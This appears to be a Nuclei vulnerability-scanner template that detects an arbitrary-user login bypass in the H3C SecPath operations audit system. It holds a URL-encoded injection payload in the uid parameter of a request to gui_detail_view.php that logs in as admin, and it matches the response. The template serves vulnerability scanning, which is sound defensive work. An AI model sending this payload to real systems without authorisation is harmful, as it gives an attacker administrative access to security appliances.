id: H3C-SECPATH-loginBypass

info:
  name: H3C SECPATH运维审计系统任意用户登录
  author: str1am
  severity: high
  reference:
    - https://www.cnblogs.com/q1ya/articles/14956391.html
  tags: SECPATH,loginBypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "错误的id"
        part: body
        condition: and
